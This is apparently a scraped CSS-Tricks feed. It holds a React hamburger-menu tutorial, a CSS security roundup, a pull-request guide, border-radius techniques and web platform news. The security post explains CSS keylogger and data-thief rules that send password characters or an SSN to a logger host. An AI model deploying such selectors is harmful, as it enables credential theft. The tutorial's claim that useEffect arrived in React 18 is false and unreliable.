// Menu -> index.js export { default } from './Menu'; // Menu.styled.js import styled from 'styled-components'; export const StyledMenu = styled.nav` display: flex; flex-direction: column; justify-content: center; background: ${({ theme }) => theme.primaryLight}; height: 100vh; text-align: left; padding: 2rem; position: absolute; top: 0; left: 0; transition: transform 0.3s ease-in-out; @media (max-width: ${({ theme }) => theme.mobile}) { width: 100%; } a { font-size: 2rem; text-transform: uppercase; padding: 2rem 0; font-weight: bold; letter-spacing: 0.5rem; color: ${({ theme }) => theme.primaryDark}; text-decoration: none; transition: color 0.3s linear; @media (max-width: ${({ theme }) => theme.mobile}) { font-size: 1.5rem; text-align: center; } &:hover { color: ${({ theme }) => theme.primaryHover}; } } `;

Next, let’s add the layout for the menu items that are revealed when clicking on our burger:

// Menu.js import React from 'react'; import { StyledMenu } from './Menu.styled'; const Menu = () => { return ( <StyledMenu> <a href="/"> <span role="img" aria-label="about us">&#x1f481;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;</span> About us </a> <a href="/"> <span role="img" aria-label="price">&#x1f4b8;</span> Pricing </a> <a href="/"> <span role="img" aria-label="contact">&#x1f4e9;</span> Contact </a> </StyledMenu> ) } export default Menu;

We’ve got nice emojis here, and best practice is to make them accessible by wrapping each one in a span and adding a couple of properties: role="img" and aria-label="your label". You can read more about it here.

Time to import our new components into our App.js file:

// App.js import React from 'react'; import { ThemeProvider } from 'styled-components'; import { GlobalStyles } from './global'; import { theme } from './theme'; import { Burger, Menu } from './components'; // ...

Let’s see, what we’ve got:

Take a look at this nice navigation bar! But we’ve got one issue here: it’s opened, and we want it initially to be closed. We only need to add one line to Menu.styled.js fix it:

// Menu.styled.js transform: translateX(-100%);

We are well on our way to calling this burger cooked! But first…

Adding open and close functionality

We want to open the sidebar when clicking the hamburger icon, so let’s get to it. Open App.js and add some state to it. We will use the useState hook for it.

// App.js import React, { useState } from 'react';

After you import it, let’s use it inside the App component.

// App.js const [open, setOpen] = useState(false);

We set the initial state to false, because our menu should be hidden when the application is rendered.

We need both our toggle and sidebar menu to know about the state, so pass it down as a prop to each component. Now your App.js should look something like this:

// App.js import React, { useState } from 'react'; import { ThemeProvider } from 'styled-components'; import { GlobalStyles } from './global'; import { theme } from './theme'; import { Burger, Menu } from './components'; function App() { const [open, setOpen] = useState(false); return ( <ThemeProvider theme={theme}> <> <GlobalStyles /> <div> <h1>Hello. This is burger menu tutorial</h1> <img src="https://media.giphy.com/media/xTiTnwj1LUAw0RAfiU/giphy.gif" alt="animated burger" /> </div> <div> <Burger open={open} setOpen={setOpen} /> <Menu open={open} setOpen={setOpen} /> </div> </> </ThemeProvider> ); } export default App;

Notice that we’re wrapping our components in a div. This will be helpful later when we add functionality that closes the menu when clicking anywhere on the screen.

Handle props in the components

Our Burger and Menu know about the state, so all we need to do is to handle it inside and add styles accordingly. Go to Burger.js and handle the props that were passed down:

// Burger.js import React from 'react'; import { bool, func } from 'prop-types'; import { StyledBurger } from './Burger.styled'; const Burger = ({ open, setOpen }) => { return ( <StyledBurger open={open} onClick={() => setOpen(!open)}> <div /> <div /> <div /> </StyledBurger> ) } Burger.propTypes = { open: bool.isRequired, setOpen: func.isRequired, }; export default Burger;

We destructure the open and setOpen props and pass them to our StyledBurger to add styles for each prop, respectively. Also, we add the onClick handler to call our setOpen function and toggle open prop. At the end of the file, we add type checking, which is considered a best practice for aligning arguments with expected data.

You can check whether it works or not by going to your react-dev-tools. Go to Components tab in your Chrome DevTools and click on Burger tab.

Now, when you click on your Burger component, (don’t mix it up with the tab), you should see, that your open checkbox is changing its state.

Go to Menu.js and do almost the same, although, here we pass only the open prop:

// Menu.js import React from 'react'; import { bool } from 'prop-types'; import { StyledMenu } from './Menu.styled'; const Menu = ({ open }) => { return ( <StyledMenu open={open}> <a href="/"> <span role="img" aria-label="about us">&#x1f481;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;</span> About us </a> <a href="/"> <span role="img" aria-label="price">&#x1f4b8;</span> Pricing </a> <a href="/"> <span role="img" aria-label="contact">&#x1f4e9;</span> Contact </a> </StyledMenu> ) } Menu.propTypes = { open: bool.isRequired, } export default Menu;

Next step is to pass open prop down to our styled component so we could apply the transition. Open Menu.styled.js and add the following to our transform property:

transform: ${({ open }) => open ? 'translateX(0)' : 'translateX(-100%)'};

This is checking if our styled component open prop is true, and if so, it adds translateX(0) to move our navigation back on the screen. You can already test it out locally!

Wait, wait, wait!

Did you notice something wrong when checking things out? Our Burger has the same color as the background color of our Menu, which make them blend together. Let’s change that and also animate the icon a bit to make it more interesting. We’ve got the open prop passed to it, so we can use that to apply the changes.

Open Burger.styled.js and write the following:

// Burger.styled.js import styled from 'styled-components'; export const StyledBurger = styled.button` position: absolute; top: 5%; left: 2rem; display: flex; flex-direction: column; justify-content: space-around; width: 2rem; height: 2rem; background: transparent; border: none; cursor: pointer; padding: 0; z-index: 10; &:focus { outline: none; } div { width: 2rem; height: 0.25rem; background: ${({ theme, open }) => open ? theme.primaryDark : theme.primaryLight}; border-radius: 10px; transition: all 0.3s linear; position: relative; transform-origin: 1px; :first-child { transform: ${({ open }) => open ? 'rotate(45deg)' : 'rotate(0)'}; } :nth-child(2) { opacity: ${({ open }) => open ? '0' : '1'}; transform: ${({ open }) => open ? 'translateX(20px)' : 'translateX(0)'}; } :nth-child(3) { transform: ${({ open }) => open ? 'rotate(-45deg)' : 'rotate(0)'}; } } `;

This is a big chunk of CSS, but it makes the animation magic happen. We check if the open prop is true and change styles accordingly. We rotate, translate, then hide the menu icon’s lines while changing color. Beautiful, isn’t it?

Okay, folks! By now, you should know how to create a simple hamburger icon and menu, that incorporates responsiveness and smooth animation. Congratulations!

But there’s one last thing we ought to account for...

Close the menu by clicking outside of it

This part seems like a small bonus, but it’s a big UX win because it allows the user to close the menu by clicking anywhere else on the page. This helps the user avoid having to re-locate the menu icon and clicking exactly on it.

We’re going to put more React hooks to use to make this happen! Create a file in the src directory, called hooks.js and open it. For this one, we’re gonna turn to the useEffect hook, which was introduced in React 18.

// hooks.js import { useEffect } from 'react';

Before we write the code, let’s think about the logic behind this hook. When we click somewhere on the page, we need to check whether the clicked element is our current element (in our case, that is the Menu component) or if the clicked element contains the current element (for instance, our div that wraps our menu and hamburger icon). If so, we don’t do anything, otherwise, we call a function, that we’ll name handler.

We are going to use ref to check the clicked element, and we will do so every time someone clicks on the page.

// hooks.js import { useEffect } from 'react'; export const useOnClickOutside = (ref, handler) => { useEffect(() => { const listener = event => { if (!ref.current || ref.current.contains(event.target)) { return; } handler(event); }; document.addEventListener('mousedown', listener); return () => { document.removeEventListener('mousedown', listener); }; }, [ref, handler], ); };

Don’t forget to return the function from useEffect. That’s so-called "clean up" and, basically, it stands for removing an event listener when the component unmounts. It is the replacement of componentWillUnmount lifecycle.

Now let’s hook up the hook

We’ve got our hook ready, so it’s time to add it to the app. Go to the App.js file, and import two hooks: the newly created useOnClickOutside and also useRef. We’ll need the latter to get a reference to the element.

// App.js import React, { useState, useRef } from 'react'; import { useOnClickOutside } from './hooks';

To get access these in the current element, we need to get access to the DOM node. That’s where we use useRef, also, the name node perfectly reflects the point of this variable.

From there, we pass the node as a first argument. We’ll pass the function that closes our menu as a second argument.

// App.js const node = useRef(); useOnClickOutside(node, () => setOpen(false));

Lastly, we need to pass our ref to the DOM element. In our case, it will be div, that holds the Burger and Menu components:

// App.js <div ref={node}> <Burger open={open} setOpen={setOpen} /> <Menu open={open} setOpen={setOpen} /> </div>

Your App.js should look similar to this:

// App.js import React, { useState, useRef } from 'react'; import { ThemeProvider } from 'styled-components'; import { useOnClickOutside } from './hooks'; import { GlobalStyles } from './global'; import { theme } from './theme'; import { Burger, Menu } from './components'; function App() { const [open, setOpen] = useState(false); const node = useRef(); useOnClickOutside(node, () => setOpen(false)); return ( <ThemeProvider theme={theme}> <> <GlobalStyles /> <div> <h1>Hello. This is burger menu tutorial</h1> <img src="https://media.giphy.com/media/xTiTnwj1LUAw0RAfiU/giphy.gif" alt="animated burger" /> </div> <div ref={node}> <Burger open={open} setOpen={setOpen} /> <Menu open={open} setOpen={setOpen} /> </div> </> </ThemeProvider> ); } export default App;

Check this out! It works as expected, and it’s fully functional and responsive.

Congratulations, everyone! You did a great job! Happy coding!

View on GitHub

The post Hamburger Menu with a Side of React Hooks and Styled Components appeared first on CSS-Tricks.

“Off The Main Thread”

Css Tricks - Tue, 09/10/2019 - 4:33am

JavaScript is what they call "single-threaded." As Brian Barbour puts it:

This means it has one call stack and one memory heap.

We all feel a symptom of that regularly in the form of performance jank and non-interactivity on elements or entire sites. If we give JavaScript lots of jobs and it gets really busy doing them, then it's not doing other things, like, say, handling our event handlers quickly.

There has been an interesting point/counter-point combo recently along these lines.

Das Surma has been advocating for moving as much JavaScript off the main thread as you possibly can. In fact, when it comes to using Web Workers, he suggests:

You should always use Web Workers.

Web Workers being the primary way to run JavaScript off the main thread.

There is lots to consider, of course, but I like how he compares this to how other languages call the main thread the "UI thread." If what you are doing is UI-related, do it on the main thread; if it's not, do it off the main thread. An example? State management.

David Gilbertson must have read that and wrote:

I saw an article recently making the case that updating a Redux store was a good candidate for Web Workers because it’s not UI work (and non-UI work doesn’t belong on the main thread). Chucking the data processing over to a worker thread sounds sensible, but the idea struck me as a little, umm, academic.

David's main point, it seems to me, is that some of the hefty JavaScript things we need to do are in response to user-initiated actions where the user needs to wait for things to finish anyway, so an unresponsive UI during that time is OK. But for anything that isn't user-initiated — and takes longer than say 100ms — he agrees a Web Worker is helpful.

(Looking at that 100ms thing, it's worth noting that a major point Das Surma is making is that the world is full of low-end phones — and who knows what 100ms on a high-end phone is when translated to on a low-end phone.)

The post “Off The Main Thread” appeared first on CSS-Tricks.

CSS Security Vulnerabilities

Css Tricks - Mon, 09/09/2019 - 11:32am

Don't read that headline and get worried. I don't think CSS is a particularly dangerous security concern and, for the most part, I don't think you need to worry about it.

But every once in a while, articles tend to circulate and get some attention as to the possibilities of what CSS can do that might surprise or worry you.

Here's a little roundup.

The Visited Link Concern

This one goes like this:

  1. You put a link to a particular page on your site, say <a href="https://i-tickle-pigs.com">Tickle Pigs</a>
  2. You style the visited state of that link like a:visited { color: pink; } which is not a default user agent style.
  3. You test the computed style of that link.
  4. If it's pink, this user is a pig tickler.
  5. You report that pig tickling information back to some server somewhere and presumably triple their pig owning insurance rates as surely the pigs will suffer extreme emotional distress over all the tickling.

You might even be able to do it entirely in CSS, because that :visited style might have like background-image: url(/data-logger/tickle.php); which is only requested by pig ticklers.

Worried? Don't be, browsers have all prevented this from being possible.

The Keylogger

This one goes like this:

  1. There is an input on the page. Perhaps a password input. Scary!
  2. You put a logger script as the value for the input's background image, but also one billion more selectors just like that such that the logger will collect and report some or all of the password.
input[value^="a"] { background: url(logger.php?v=a); }

This one isn't that easy. The value attribute of an input doesn't change just because you type into it. It does sometimes in frameworks like React though, so if you were to slip this CSS onto a login page powered by React and coded in that way then, theoretically, this CSS-powered keylogger could work.

But... in that case, JavaScript is executing on that page anyway. JavaScript is 1000× more concerning than CSS for things like this. A keylogger in JavaScript is just a couple of lines of code watching for keypress events and reporting them via Ajax.

Third-party and XSS injected inline JavaScript is now stoppable with Content Security Policy (CSP)... but so is CSS.

The Data Thief

This one goes like this:

  1. If I can get some of my nefarious CSS onto a page where you've authenticated into a site...
  2. And that site displays sensitive information like a social security number (SSN) in a pre-filled form...
  3. I can use attribute selectors to figure it out.
input#ssn[value="123-45-6789"] { background: url(https://secret-site.com/logger.php?ssn=123-45-6789); }

A billion selectors and you've covered all the possibilities!

The inline style block whoopsie

I don't know if I'd blame CSS for this necessarily, but imagine:

<style> ... Drop in some user-generated stuff ... </style>

Perhaps you're allowing the user some CSS customization there. That's an attack vector, as they could close that style tag, open a script tag, and write nefarious JavaScript.

I'm sure there are a bunch more

Got 'em? Share 'em.

Paint me a little skeptical of how terrified I should be about CSS security vulnerabilities. I don't wanna downplay security things too much (especially third-party concerns) because I'm not an expert and security is of the utmost importance, but at the same time, I've never once heard of CSS being the attack vector for anything outside of a thought exercise. Educate me!

The post CSS Security Vulnerabilities appeared first on CSS-Tricks.

How to Contribute to an Open Source Project

Css Tricks - Mon, 09/09/2019 - 4:10am

The following is going to get slightly opinionated and aims to guide someone on their journey into open source. As a prerequisite, you should have basic familiarity with the command line and Git. If you know the concepts and want to dive right into the step by step how-to guide, check out this part of the article.

Truly, there is no one way to contribute to an open source project, and to be involved often means more than code slinging. In this article, though, we’re going to focus on the nitty-gritty of contributing a pull request (PR) to someone else’s project on GitHub.

Let's set the stage...

You come across someone's project on Github and you love it! You may even decide to use it in your own project. But there’s one small thing you notice... it could be a bug. It could be an enhancement to what’s already there. Maybe you looked through the code and found a nice, optimized way of writing things that’s a little more legible, even as small as an extra indentation in the code.

Here are some initial suggestions and instructions on where to go from here.

Look for a CONTRIBUTING.md document or Contributing Guide in the documentation

Many open source projects know that other people might want to contribute. If they find themselves answering the same question again and again, this document intends to make it easier to get everyone on the same page.

Some things you might find in a Contributing guide:

  • Style guidelines
  • Prerequisites for submitting a PR
  • How to add your change to their documentation
  • A checklist for contribution
  • Explaining the project’s architecture and setup

This document can be as simple as a few notes, or it can be so robust that it takes you a little while to read through it all (like Atom’s Contributing guide, for example).

For larger projects, it makes sense to communicate contributing guidelines up front because PRs and issues can pile up and be a real drag on a maintainer's time, sorting through contributions that might be out of the project's scope. Make sure to take some of your own time reading through this guide if it exists because your PR will require some of the maintainer's time as well.

Look through the existing issues and PRs

Before adding a new issue or submitting a PR, it’s good to check what else is out there. You might find someone has already asked about the same thing, or submitted something similar. You can check in the project's search box — I usually search through issues that are both open and closed, as it’s important to know if someone already raised my concern and perhaps the maintainer decided to go in another direction. Again, it's about saving both you and the maintainer time.

Submit an issue

Submitting issues is a core part of the PR submission process. They provide an opportunity to articulate the situation, establish context around it, and provide a forum for discussion that can be attached to the PR itself.

When submitting an issue, I like to write out what my concern is and then re-read it as if I was on the receiving end. People are human — even if what you say is technically correct, you’re not likely to get buy-in for your idea if your tone is off-putting. Consider this: you may be asking for someone to do a lot of work in their spare time. If someone asks you to do work on a Saturday, are you more likely to do so if they ask respectfully with condescension? You get the picture.

When submitting an issue, make sure you give them all the details they need to get the work done. Some things you might note:

  • If it’s a bug, then what environment you’re seeing the problem in? Is it development or production? Perhaps somewhere else?
  • If it’s a feature request, then explain the problem. Sometimes framing this from the perspective of the end user in the form of user stories can be helpful, both to conceptualize the situation and abstract it from any personal feelings.
  • If it’s a general question, then state that up front so the maintainer can avoid spending time trying to figure out if you’re asking for a bug or a feature.
  • If you’d like to submit a PR to improve on the issue, mention that you’d like to do this, then ask permission to proceed (because sometimes maintainers have other items planned you may be unaware of).
Make considerations before starting work

You're probably eager to start working on your PR by this point. But first, there are still a few customary things to check off before you dig in.

Ask first

I’m a big fan of people asking in an issue if a PR makes sense before they work on one. I don’t hold it as a strict rule, but sometimes I can save them buckets of time and going in the wrong direction if we can clarify what we both want together first. It also helps others know to not implement the same thing (assuming they, too, look through open and closed PRs.

Use labels

If you do submit an issue and everyone agrees a PR is a good idea, then it’s nice for you (or the owner of the repo) to add the label in progress. You can search labels so it’s really clear to everyone you’re working on it.

Work in small chunks!

As a maintainer, it’s frustrating when someone put in a lot of work and submits a giant honking PR that does 10 different things. It’s really tough to review, and inevitably, they’re doing six things you want, and four things you don’t. Not only that, it’s usually spread out over multiple files which is difficult to untangle. I’ve definitely closed PRs with some high-quality code I would like just because it would take forever for to review and manage it. (I will communicate that this is the issue if they would like to resubmit the work as separate PRs, though.)

In my opinion, you have about 1,000% more chance of getting your PR merged and your time spent honored if you split things over multiple, smaller PRs. I love it when people submit a PR per topic. And it can be nice, not required, if each submission is a little spaced out as well to help with the cognitive overload.

Submit your PR

These are the steps I personally use to submit a PR. You can get this done other ways, of course, but I have found the following to be effective in my experiences. Also, anything in the commands that are written in ALL CAPS is information you will need to change for your use.

First off, go to the repo, and fork a copy of the project to your personal GitHub account. Clone it locally and change directory (cd) to where it's located. (I use HTTPS, but SSH is totally fine as well.)

git clone https://github.com/YOUR-USERNAME/YOUR-FORKED-REPO.git cd into/cloned/fork-repo

Next up, add a remote upstream to the original branch. This means it will share a connection with that original branch so that you can keep in sync and pull down any updates to the project when they happen.

git remote add upstream https://github.com/ORIGINAL-DEV-USERNAME/REPO-YOU-FORKED-FROM.git git fetch upstream

Now you can create a new branch and give it a name that relates to the PR topic. Note that a maintainer might have a specific naming convention in mind that is documented in the repo.

git checkout -b GOOD-FORKIN-NAME

Go forth and work on your changes. Be sure to make good commit messages along the way:

git add -A git commit -m “ADDING IN A TACO DISPENSER” git push origin GOOD-FORKIN-NAME

GitHub will see the new fork and prompt you to make the PR, which is a nice, helpful touch. You click the button and fill in details: what issue does it close? you can refer to them by their number and GitHub will automatically associate it:

On the PR:

PR" />

In the Issue:

What are some of the things to note in the PR? These details help the maintainer understand context. These can be all the changes you made, they can be larger strategy or context.

And you’re on your way! &#x1f389;

You may find you need to keep your fork up-to-date with the remote, and pull their changes into yours. To do so, you would run this command:

git pull upstream master

Props to Christina Solana for her Gist which I’ve used as a reference for years and years now.

Always remember: maintainers are often swamped, sacrificing nights and weekends to keep open source projects active and updated. Being respectful, both in terms of their time, and in tone, can set you up for success in contributing.

Open source can be extremely rewarding! Knowing other people are benefitting and directly using something you contributed can be a great way to give back to the community and learn.

The post How to Contribute to an Open Source Project appeared first on CSS-Tricks.

Various Methods for Expanding a Box While Preserving the Border Radius

Css Tricks - Fri, 09/06/2019 - 4:19am

?I've recently noticed an interesting change on CodePen: on hovering the pens on the homepage, there's a rectangle with rounded corners expanding in the back.

Expanding box effect on the CodePen homepage.

Being the curious creature that I am, I had to check how this works! Turns out, the rectangle in the back is an absolutely positioned ::after pseudo-element.

Initial ::after styles. A positive offset goes inwards from the parent's padding limit, while a negative one goes outwards.

On :hover, its offsets are overridden and, combined with the transition, we get the expanding box effect.

The ::after styles on :hover.

The right property has the same value (-1rem) in both the initial and the :hover rule sets, so it's unnecessary to override it, but all the other offsets move by 2rem outwards (from 1rem to -1rem for the top and left offsets and from -1rem to -3rem for the bottom offset)

One thing to notice here is that the ::after pseudo-element has a border-radius of 10px which gets preserved as it expands. Which got me to think about what methods we have for expanding/shrinking (pseudo-) elements while preserving their border-radius. How many can you think of? Let me know if you have ideas that haven't been included below, where we take a look at a bunch of options and see which is best suited for what situation.

Changing offsets

This is the method used on CodePen and it works really well in this particular situation for a bunch of reasons. First off, it has great support. It also works when the expanding (pseudo-) element is responsive, with no fixed dimensions and, at the same time, the amount by which it expands is fixed (a rem value). It also works for expanding in more than two directions (top, bottom and left in this particular case).

There are however a couple of caveats we need to be aware of.

First, our expanding element cannot have position: static. This is not a problem in the context of the CodePen use case since the ::after pseudo-element needs to be absolutely positioned anyway in order to be placed underneath the rest of this parent's content.

Second, going overboard with offset animations (as well as, in general, animating any property that affects layout with box properties the way offsets, margins, border widths, paddings or dimensions do) can negatively impact performance. Again, this is not something of concern here, we only have a little transition on :hover, no big deal.

Changing dimensions

Instead of changing offsets, we could change dimensions instead. However, this is a method that works if we want our (pseudo-) element to expand in, at most, two directions. Otherwise, we need to change offsets as well. In order to better understand this, let's consider the CodePen situation where we want our ::after pseudo-elements to expand in three directions (top, bottom and left).

The relevant initial sizing info is the following:

.single-item::after { top: 1rem; right: -1rem; bottom: -1rem; left: 1rem; }

Since opposing offsets (the top-bottom and left-right pairs) cancel each other (1rem - 1rem = 0), it results that the pseudo-element's dimensions are equal to those of its parent (or 100% of the parent's dimensions).

So we can re-write the above as:

.single-item::after { top: 1rem; right: -1rem; width: 100%; height: 100%; }

On :hover, we increase the width by 2rem to the left and the height by 4rem, 2rem to the top and 2rem to the bottom. However, just writing:

.single-item::after { width: calc(100% + 2rem); height: calc(100% + 4rem); }

...is not enough, as this makes the height increase the downward direction by 4rem instead of increasing it by 2rem up and 2rem down. The following demo illustrates this (put :focus on or hover over the items to see how the ::after pseudo-element expands):

See the Pen by thebabydino (@thebabydino) on CodePen.

We'd need to update the top property as well in order to get the desired effect:

.single-item::after { top: -1rem; width: calc(100% + 2rem); height: calc(100% + 4rem); }

Which works, as it can be seen below:

See the Pen by thebabydino (@thebabydino) on CodePen.

But, to be honest, this feels less desirable than changing offsets alone.

However, changing dimensions is a good solution in a different kind of situation, like when we want to have some bars with rounded corners that expand/shrink in a single direction.

See the Pen by thebabydino (@thebabydino) on CodePen.

Note that, if we didn't have rounded corners to preserve, the better solution would be to use directional scaling via the transform property.

Changing padding/border-width

Similar to changing the dimensions, we can change the padding or border-width (for a border that's transparent). Note that, just like with changing the dimensions, we need to also update offsets if expanding the box in more than two dimensions:

See the Pen by thebabydino (@thebabydino) on CodePen.

In the demo above, the pinkish box represents the content-box of the ::after pseudo-element and you can see it stays the same size, which is important for this approach.

In order to understand why it is important, consider this other limitation: we also need to have the box dimensions defined by two offsets plus the width and the height instead of using all four offsets. This is because the padding/ border-width would only grow inwards if we were to use four offsets rather than two plus the width and the height.

See the Pen by thebabydino (@thebabydino) on CodePen.

For the same reason, we cannot have box-sizing: border-box on our ::after pseudo-element.

See the Pen by thebabydino (@thebabydino) on CodePen.

In spite of these limitations, this method can come in handy if our expanding (pseudo-) element has text content we don't want to see moving around on :hover as illustrated by the Pen below, where the first two examples change offsets/ dimensions, while the last two change paddings/ border widths:

See the Pen by thebabydino (@thebabydino) on CodePen.

Changing margin

Using this method, we first set the offsets to the :hover state values and a margin to compensate and give us the initial state sizing:

.single-item::after { top: -1rem; right: -1rem; bottom: -3rem; left: -1rem; margin: 2rem 0 2rem 2rem; }

Then we zero this margin on :hover:

.single-item:hover::after { margin: 0 }

See the Pen by thebabydino (@thebabydino) on CodePen.

This is another approach that works great for the CodePen situation, though I cannot really think of other use cases. Also note that, just like changing offsets or dimensions, this method affects the size of the content-box, so any text content we may have gets moved and rearranged.

Changing font size

This is probably the trickiest one of all and has lots of limitations, the most important of which being we cannot have text content on the actual (pseudo-) element that expands/shrinks — but it's another method that would work well in the CodePen case.

Also, font-size on its own doesn't really do anything to make a box expand or shrink. We need to combine it with one of the previously discussed properties.

For example, we can set the font-size on ::after to be equal to 1rem, set the offsets to the expanded case and set em margins that would correspond to the difference between the expanded and the initial state.

.single-item::after { top: -1rem; right: -1rem; bottom: -3rem; left: -1rem; margin: 2em 0 2em 2em; font-size: 1rem; }

Then, on :hover, we bring the font-size to 0:

.single-item:hover::after { font-size: 0 }

See the Pen by thebabydino (@thebabydino) on CodePen.

We can also use font-size with offsets, though it gets a bit more complicated:

.single-item::after { top: calc(2em - 1rem); right: -1rem; bottom: calc(2em - 3rem); left: calc(2em - 1rem); font-size: 1rem; } .single-item:hover::after { font-size: 0 }

Still, what's important is that it works, as it can be seen below:

See the Pen by thebabydino (@thebabydino) on CodePen.

Combining font-size with dimensions is even hairier, as we also need to change the vertical offset value on :hover on top of everything:

.single-item::after { top: 1rem; right: -1rem; width: calc(100% + 2em); height: calc(100% + 4em); font-size: 0; } .single-item:hover::after { top: -1rem; font-size: 1rem }

Oh, well, at least it works:

See the Pen by thebabydino (@thebabydino) on CodePen.

Same thing goes for using font-size with padding/border-width:

.single-item::after { top: 1rem; right: -1rem; width: 100%; height: 100%; font-size: 0; } .single-item:nth-child(1)::after { padding: 2em 0 2em 2em; } .single-item:nth-child(2)::after { border: solid 0 transparent; border-width: 2em 0 2em 2em; } .single-item:hover::after { top: -1rem; font-size: 1rem; }

See the Pen by thebabydino (@thebabydino) on CodePen.

Changing scale

If you've read pieces on animation performance, then you've probably read it's better to animate transforms instead of properties that impact layout, like offsets, margins, borders, paddings, dimensions — pretty much what we've used so far!

The first issue that stands out here is that scaling an element also scales its corner rounding, as illustrated below:

See the Pen by thebabydino (@thebabydino) on CodePen.

We can get around this by also scaling the border-radius the other way.

Let's say we scale an element by a factor $fx along the x axis and by a factor $fy along the y axis and we want to keep its border-radius at a constant value $r.

This means we also need to divide $r by the corresponding scaling factor along each axis.

border-radius: #{$r/$fx}/ #{$r/$fy}; transform: scale($fx, $fy)

See the Pen by thebabydino (@thebabydino) on CodePen.

However, note that with this method, we need to use scaling factors, not amounts by which we expand our (pseudo-) element in this or that direction. Getting the scaling factors from the dimensions and expansion amounts is possible, but only if they're expressed in units that have a certain fixed relation between them. While preprocessors can mix units like in or px due to the fact that 1in is always 96px, they cannot resolve how much 1em or 1% or 1vmin or 1ch is in px as they lack context. And calc() is not a solution either, as it doesn't allow us to divide a length value by another length value to get a unitless scale factor.

This is why scaling is not a solution in the CodePen case, where the ::after boxes have dimensions that depend on the viewport and, at the same time, expand by fixed rem amounts.

But if our scale amount is given or we can easily compute it, this is an option to consider, especially since making the scaling factors custom properties we then animate with a bit of Houdini magic can greatly simplify our code.

border-radius: calc(#{$r}/var(--fx))/ calc(#{$r}/var(--fy)); transform: scale(var(--fx), var(--fy))

Note that Houdini only works in Chromium browsers with the Experimental Web Platform features flag enabled.

For example, we can create this tile grid animation:

Looping tile grid animation (Demo, Chrome with flag only)

The square tiles have an edge length $l and with a corner rounding of $k*$l:

.tile { width: $l; height: $l; border-radius: calc(#{$r}/var(--fx))/ calc(#{$r}/var(--fy)); transform: scale(var(--fx), var(--fy)) }

We register our two custom properties:

CSS.registerProperty({ name: '--fx', syntax: '<number>', initialValue: 1, inherits: false }); CSS.registerProperty({ name: '--fy', syntax: '<number>', initialValue: 1, inherits: false });

And we can then animate them:

.tile { /* same as before */ animation: a $t infinite ease-in alternate; animation-name: fx, fy; } @keyframes fx { 0%, 35% { --fx: 1 } 50%, 100% { --fx: #{2*$k} } } @keyframes fy { 0%, 35% { --fy: 1 } 50%, 100% { --fy: #{2*$k} } }

Finally, we add in a delay depending on the horizontal (--i) and vertical (--j) grid indices in order to create a staggered animation effect:

animation-delay: calc((var(--i) + var(--m) - var(--j))*#{$t}/(2*var(--m)) - #{$t}), calc((var(--i) + var(--m) - var(--j))*#{$t}/(2*var(--m)) - #{1.5*$t})

Another example is the following one, where the dots are created with the help of pseudo-elements:

Looping spikes animation (Demo, Chrome with flag only)

Since pseudo-elements get scaled together with their parents, we need to also reverse the scaling transform on them:

.spike { /* other spike styles */ transform: var(--position) scalex(var(--fx)); &::before, &::after { /* other pseudo styles */ transform: scalex(calc(1/var(--fx))); } } Changing... clip-path?!

This is a method I really like, even though it cuts out pre-Chromium Edge and Internet Explorer support.

Pretty much every usage example of clip-path out there has either a polygon() value or an SVG reference value. However, if you've seen some of my previous articles, then you probably know there are other basic shapes we can use, like inset(), which works as illustrated below:

How the inset() function works. (Demo)

So, in order to reproduce the CodePen effect with this method, we set the ::after offsets to the expanded state values and then cut out what we don't want to see with the help of clip-path:

.single-item::after { top: -1rem; right: -1rem; bottom: -3em; left: -1em; clip-path: inset(2rem 0 2rem 2rem) }

And then, in the :hover state, we zero all insets:

.single-item:hover::after { clip-path: inset(0) }

This can be seen in action below:

See the Pen by thebabydino (@thebabydino) on CodePen.

Alright, this works, but we also need a corner rounding. Fortunately, inset() lets us specify that too as whatever border-radius value we may wish.

Here, a 10px one for all corners along both directions does it:

.single-item::after { /* same styles as before */ clip-path: inset(2rem 0 2rem 2rem round 10px) } .single-item:hover::after { clip-path: inset(0 round 10px) }

And this gives us exactly what we were going for:

See the Pen by thebabydino (@thebabydino) on CodePen.

Furthermore, it doesn't really break anything in non-supporting browsers, it just always stays in the expanded state.

However, while this is method that works great for a lot of situations — including the CodePen use case — it doesn't work when our expanding/shrinking elements have descendants that go outside their clipped parent's border-box, as it is the case for the last example given with the previously discussed scaling method.

The post Various Methods for Expanding a Box While Preserving the Border Radius appeared first on CSS-Tricks.

Weekly Platform News: Text Spacing Bookmarklet, Top-Level Await, New AMP Loading Indicator

Css Tricks - Thu, 09/05/2019 - 9:15am

In this week's roundup, a handy bookmarklet for inspecting typography, using await to tinker with how JavaScript modules import one another, plus Facebook's in-app browser is only posing as one. Let's get into the news!

Check if your content breaks after increasing text spacing

Dylan Barrell from Deque has created a bookmarklet that you can use to check if there are any issues with the content or functionality of your website after increasing the line, paragraph, letter, and word spacing, according to the “Text Spacing” success criterion of the Web Content Accessibility Guidelines.

(via Dylan Barrell)

Using top-level await in JavaScript modules

The proposed top-level await feature is especially useful in JavaScript modules: If module A uses top-level await (e.g., to connect to a database), and module B imports module A — via the import declaration — then the body of B will be evaluated after the body of A (i.e., B will correctly wait for A).

Top-level await enables modules to act as big async functions: With top-level await, ECMAScript Modules (ESM) can await resources, causing other modules who import them to wait before they start evaluating their body.

(via Brian Kardell)

AMP’s new multi-stage loading indicator

AMP has created a new multi-stage loading indicator that has better perceived performance (tested on 2,500 users): It shows nothing until 0.5s, then an intermediate animation until 3.5s, and finally a looping spinner after that.

(via Andrew Watterson)

In other news...
  • AMP has released the <amp-script> element which, for the first time, allows AMP pages to add custom JavaScript, with some constraints: The code runs in a separate worker thread and requires a user gesture to change page content (via AMP Project).
  • The HTML Standard has made autofocus a global attribute that “applies to all elements, not just to form controls” (e.g., this change enables <div contenteditable autofocus>, but no browser supports this yet) (via Kent Tamura).
  • Facebook’s in-app browser (powered by Android's WebView) is not a browser: “Facebook is breaking the web for 20–30% of your traffic because you aren't demanding they do better” (via Alex Russell).

Read more news in my new, weekly Sunday issue. Visit webplatform.news for more information.

The post Weekly Platform News: Text Spacing Bookmarklet, Top-Level Await, New AMP Loading Indicator appeared first on CSS-Tricks.

Using a PostCSS function to automate your responsive workflow

Css Tricks - Thu, 09/05/2019 - 4:17am

A little while back, you might have bumped into this CSS-Tricks article where I described how a mixin can be used to automate responsive font sizes using RFS. In its latest version, v9, RFS is capable of rescaling any value for value for any CSS property with px or rem units, like margin, padding, border-radius or even box-shadow.

Today, we’ll focus on its PostCSS implementation. First thing to do, is install RFS with npm:

npm install rfs

